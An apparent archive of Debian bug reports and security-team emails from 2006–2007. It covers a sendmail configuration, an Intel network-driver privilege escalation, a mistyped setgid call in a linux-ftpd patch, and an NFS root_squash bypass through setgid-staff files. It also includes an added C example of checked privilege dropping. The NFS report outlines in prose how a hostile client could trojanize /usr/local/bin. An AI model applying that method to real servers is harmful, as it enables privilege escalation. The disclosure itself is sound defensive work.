drwxr-xr-x   2 root  root   4096 Dec  2 09:21 peers
drwxr-xr-x   2 root  smmsp  4096 Jun  4  2005 sasl
-rw-r--r--   1 root  smmsp  8198 Dec  2 09:22 sendmail.cf
-rw-r--r--   1 root  smmsp   269 Dec  2 09:22 sendmail.cf.errors
-rw-r--r--   1 root  root  10032 May  6  2002 sendmail.conf
-rw-r--r--   1 root  smmsp    46 Dec  2 09:22 sendmail.mc
-rw-r--r--   1 root  root    149 Jun  4  2005 service.switch
-rw-r--r--   1 root  root    180 Jun  4  2005 service.switch-nodns
drwxr-sr-x   2 smmta smmsp  4096 Dec  2 09:21 smrsh
-rw-r--r--   1 root  smmsp  7794 Dec  2 09:22 submit.cf
-rw-r--r--   1 root  smmsp    59 Dec  2 09:22 submit.mc
drwxr-xr-x   2 smmta smmsp  4096 Dec  2 09:21 tls
-rw-r--r--   1 root  smmsp     0 Dec  2 09:22 trusted-users

/etc/mail/m4:
total 8
drwxr-sr-x  2 smmta smmsp 4096 Dec  2 09:21 .
drwxr-sr-x  7 smmta smmsp 4096 Dec  2 09:22 ..
-rw-r-----  1 root  smmsp    0 Dec  2 09:21 dialup.m4
-rw-r-----  1 root  smmsp    0 Dec  2 09:21 provider.m4

/etc/mail/peers:
total 12
drwxr-xr-x  2 root  root  4096 Dec  2 09:21 .
drwxr-sr-x  7 smmta smmsp 4096 Dec  2 09:22 ..
-rw-r--r--  1 root  root   328 Jun  4  2005 provider

/etc/mail/sasl:
total 8
drwxr-xr-x  2 root  smmsp 4096 Jun  4  2005 .
drwxr-sr-x  7 smmta smmsp 4096 Dec  2 09:22 ..

/etc/mail/smrsh:
total 8
drwxr-sr-x  2 smmta smmsp 4096 Dec  2 09:21 .
drwxr-sr-x  7 smmta smmsp 4096 Dec  2 09:22 ..
lrwxrwxrwx  1 root  smmsp   26 Dec  2 09:21 mail.local -> /usr/lib/sm.bin/mail.local
lrwxrwxrwx  1 root  smmsp   17 Dec  2 09:21 procmail -> /usr/bin/procmail
lrwxrwxrwx  1 root  smmsp   17 Dec  2 09:21 vacation -> /usr/bin/vacation

/etc/mail/tls:
total 44
drwxr-xr-x  2 smmta smmsp 4096 Dec  2 09:21 .
drwxr-sr-x  7 smmta smmsp 4096 Dec  2 09:22 ..
-rw-r--r--  1 root  root     7 Dec  2 09:21 no_prompt
-rw-------  1 root  root  1191 Dec  2 09:21 sendmail-client.cfg
-rw-r--r--  1 root  smmsp 1245 Dec  2 09:21 sendmail-client.crt
-rw-------  1 root  root  1025 Dec  2 09:21 sendmail-client.csr
-rw-r-----  1 root  smmsp 1679 Dec  2 09:21 sendmail-common.key
-rw-------  1 root  root     0 Dec  2 09:21 sendmail-common.prm
-rw-------  1 root  root  1191 Dec  2 09:21 sendmail-server.cfg
-rw-r--r--  1 root  smmsp 1245 Dec  2 09:21 sendmail-server.crt
-rw-------  1 root  root  1025 Dec  2 09:21 sendmail-server.csr
-rwxr--r--  1 root  root  3152 Dec  2 09:21 starttls.m4

sendmail.conf:
DAEMON_MODE="Daemon";
DAEMON_PARMS="";
DAEMON_HOSTSTATS="Yes";
DAEMON_MAILSTATS="No";
QUEUE_MODE="${DAEMON_MODE}";
QUEUE_INTERVAL="10";
QUEUE_PARMS="";
MSP_MODE="${QUEUE_MODE}";
MSP_INTERVAL="${QUEUE_INTERVAL}";
MSP_PARMS="${QUEUE_PARMS}";
MSP_MAILSTATS="No";
MISC_PARMS="";
CRON_MAILTO="root";
CRON_PARMS="";
AGE_DATA="";
DAEMON_STATS="${DAEMON_MAILSTATS}";
MSP_STATS="${MSP_MAILSTATS}";


sendmail.mc:
[trigger for usr/share/sendmail/sm_helper.sh]

submit.mc...
FEATURE(`msp [trigger for usr/share/sendmail/sm_helper.sh]


-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-spm0.5
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages sendmail depends on:
ii  rmail 8.13.4-3   MTA->UUCP remote mail handler
ii  sendmail-base 8.13.4-3   powerful, efficient, and scalable 
ii  sendmail-bin  8.13.4-3   powerful, efficient, and scalable 
ii  sendmail-cf   8.13.4-3   powerful, efficient, and scalable 
ii  sensible-mda  8.13.4-3   Mail Delivery Agent wrapper

Versions of packages sensible-mda depends on:
ii  libc6   2.3.2.ds1-22 GNU C Library: Shared libraries an
ii  procmail

Bug#402094: kernel-source-2.6.8: Intel drivers (net/e100.c, net/e1000/e1000_main.c)

2006-12-07 Thread Paul Szabo
Package: kernel-source-2.6.8
Version: 2.6.8-16sarge5
Severity: critical
Justification: root security hole


Noticed:

  Intel LAN Driver Buffer Overflow Local Privilege Escalation
  http://support.intel.com/support/network/sb/CS-023726.htm

The Intel blurb says Linux, and specifically Debian, is affected also:

  Product Family             OS      Affected Driver Versions  Corrected Driver Versions
  Intel PRO 10/100 Adapters  Linux*  3.5.14 or previous        3.5.17 or later
  Intel PRO/1000 Adapters    Linux   7.2.7 or previous         7.3.15 or later

and it seems that:

kernel-source-2.6.8/drivers/net/e100.c
  #define DRV_NAME"e100"
  #define DRV_VERSION "3.0.18"
  #define DRV_DESCRIPTION "Intel(R) PRO/100 Network Driver"
  #define DRV_COPYRIGHT   "Copyright(c) 1999-2004 Intel Corporation"

kernel-source-2.6.8/drivers/net/e1000/e1000_main.c
  char e1000_driver_name[] = "e1000";
  char e1000_driver_string[] = "Intel(R) PRO/1000 Network Driver";
  char e1000_driver_version[] = "5.2.52-k4";
  char e1000_copyright[] = "Copyright (c) 1999-2004 Intel Corporation.";

are quite old (so seem to be affected).

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-spm1.6
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages kernel-source-2.6.8 depends on:
ii  binutils               2.15-6   The GNU assembler, linker and bina
ii  bzip2                  1.0.2-7  high-quality block-sorting file co
ii  coreutils [fileutils]  5.2.1-2  The GNU core utilities
ii  fileutils              5.2.1-2  The GNU file management utilities 





Bug#384454: closed by Alberto Gonzalez Iniesta <[EMAIL PROTECTED]> (Bug#384454: fixed in linux-ftpd 0.17-20sarge2)

2007-02-17 Thread Paul Szabo
Dear Maintainer,

Yes, the bug in the patch was mine: meant to check the return status of
setgid(getegid()) but somehow managed to mis-type that into
setgid(geteuid()). Stupid mistake. Shame on me.

Now, linux-ftpd_0.17-20sarge2.diff.gz was dated September 2006 as per
your latest "closure" message
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=384454;msg=44
(or maybe 20 Nov 2006 as per
http://www.debian.org/security/2006/dsa-1217
or 13 Nov 2006 as the date on current
http://security.debian.org/pool/updates/main/l/linux-ftpd/linux-ftpd_0.17-20sarge2.diff.gz
) and contains the "wrong" patch.

So this seems fixed in etch 0.17-23 since 25 Nov 2006, but not yet in
sarge (==stable) 0.17-20sarge2. Please fix for sarge also.

Thanks,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia



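
The privilege-drop pattern the patch was meant to carry, as an added example in C (not linux-ftpd code, and not the patch itself): every setgroups/setgid/setuid return value is checked, and privileges_dropped verifies the result afterwards, including that root cannot be regained through a leftover saved uid. The slip described above, setgid(geteuid()), compiles silently because uid_t and gid_t are both plain integers on Linux; a verification step like this one is what would have exposed it. Assumes Linux/glibc setuid(2) semantics (as root, setuid() sets the real, effective and saved ids); the target ids in main (65534 when run as root) are this example's assumption.

```c
/* Added example, not linux-ftpd code: a privilege drop with every return value
 * checked and the result verified, the pattern the sarge patch was meant to
 * contain.  Assumes Linux/glibc semantics: as root, setuid() sets the real,
 * effective and saved uid, so afterwards setuid(0) must fail. */
#define _DEFAULT_SOURCE 1       /* setgroups() prototype on glibc */
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/* 1 if the process now runs as exactly UID/GID and cannot get root back. */
int privileges_dropped(uid_t uid, gid_t gid)
{
    if (geteuid() != uid || getuid() != uid)
        return 0;
    if (getegid() != gid || getgid() != gid)
        return 0;
    /* If a saved uid of 0 is still around this succeeds, so the drop failed. */
    if (uid != 0 && setuid(0) == 0)
        return 0;
    return 1;
}

/* Drop to UID/GID in the only order that works: supplementary groups first
 * (needs root), then the gid while still root so setgid() is permitted, then
 * the uid.  0 on success; -1 with errno set on any failure, after which the
 * caller must exit rather than carry on with partial privilege. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(1, &gid) != 0)
        return -1;
    if (setgid(gid) != 0)       /* the call whose argument the patch got wrong */
        return -1;
    if (setuid(uid) != 0)
        return -1;
    if (!privileges_dropped(uid, gid)) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Run as root this drops to 65534/65534 (nobody/nogroup on Debian, an
     * assumption about the host); unprivileged, it re-asserts the current ids. */
    uid_t uid = geteuid() == 0 ? (uid_t)65534 : getuid();
    gid_t gid = geteuid() == 0 ? (gid_t)65534 : getgid();

    if (drop_privileges(uid, gid) != 0) {
        perror("drop_privileges");
        return 1;
    }
    printf("now uid=%ld gid=%ld, root regainable: %s\n", (long)geteuid(),
           (long)getegid(), privileges_dropped(uid, gid) ? "no" : "yes");
    return 0;
}
```

Checking setgid()'s return value, which the report says was the intent, catches a failing call but not a wrong argument: setgid(geteuid()) succeeds as root and leaves the process in a group nobody meant. Comparing getegid() against the gid you intended is the check that does.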


Bug#384454: ftpd (was Bug#384454)

2007-02-18 Thread Paul Szabo
Dear Security team,

A stupid little bug crept into (was left in) #384454 and DSA-1217.
My fault originally: I humbly apologize. Please correct it for sarge.

Thanks,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#384454: ftpd (was Bug#384454)

2007-02-20 Thread Paul Szabo
Dear Security team,

> A stupid little bug crept into (was left in) #384454 and DSA-1217.
> My fault originally: I humbly apologize. Please correct it for sarge.

Please see also:

  http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052578.html

(and bugtraq if/when they accept).

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#384454: ftpd (was Bug#384454)

2007-02-21 Thread Paul Szabo
Dear Security team,

I wrote:

> A stupid little bug crept into (was left in) #384454 and DSA-1217.
> My fault originally: I humbly apologize. Please correct it for sarge.
> Please see also:
>   http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052578.html
> (and bugtraq if/when they accept).

Bugtraq accepted also:

  http://www.securityfocus.com/archive/1/460742

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia





Bug#384922: nfs-kernel-server: root_squash is broken

2006-08-27 Thread Paul Szabo
Package: nfs-kernel-server
Version: 1:1.0.6-3.1
Severity: critical
Justification: root security hole


NFS uses root_squash by default, in part (mainly?) so as to make it more
difficult to create a setuid-root file in a writable export: protect the
exporting server from a compromise of the mounting client. With Debian
policy, group staff is root-equivalent: an evil client could create a
setgid-staff file, and with that trojanize /usr/local/bin (drop a
suitable ls or xterm or bash file).

There is a warning in "man exports" against other sensitive UIDs, but
not against sensitive GIDs. There are no sensitive UIDs on a default
Debian installation, but there is a sensitive GID mandated by policy;
there is no default or easy gid_squash on NFS exports. The intended
security benefit of root_squash is defeated.

(This is not really a bug in NFS, but a result of broken policy; maybe
NFS could document the issue, or help change policy.)

Please see also bug#299007 http://bugs.debian.org/299007 .

Cheers,

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-spm1.5
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages nfs-kernel-server depends on:
ii  debconf     1.4.30.13     Debian configuration management sy
ii  libc6       2.3.2.ds1-22  GNU C Library: Shared libraries an
ii  libwrap0    7.6.dbs-8     Wietse Venema's TCP wrappers libra
ii  nfs-common  1:1.0.6-3.1   NFS support files common to client
ii  sysvinit    2.86.ds1-1    System-V like init

-- no debconf information





Bug#384922: nfs-kernel-server: root_squash is broken

2006-08-27 Thread Paul Szabo
Please see also
http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/049079.html

Paul Szabo   [EMAIL PROTECTED]   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia

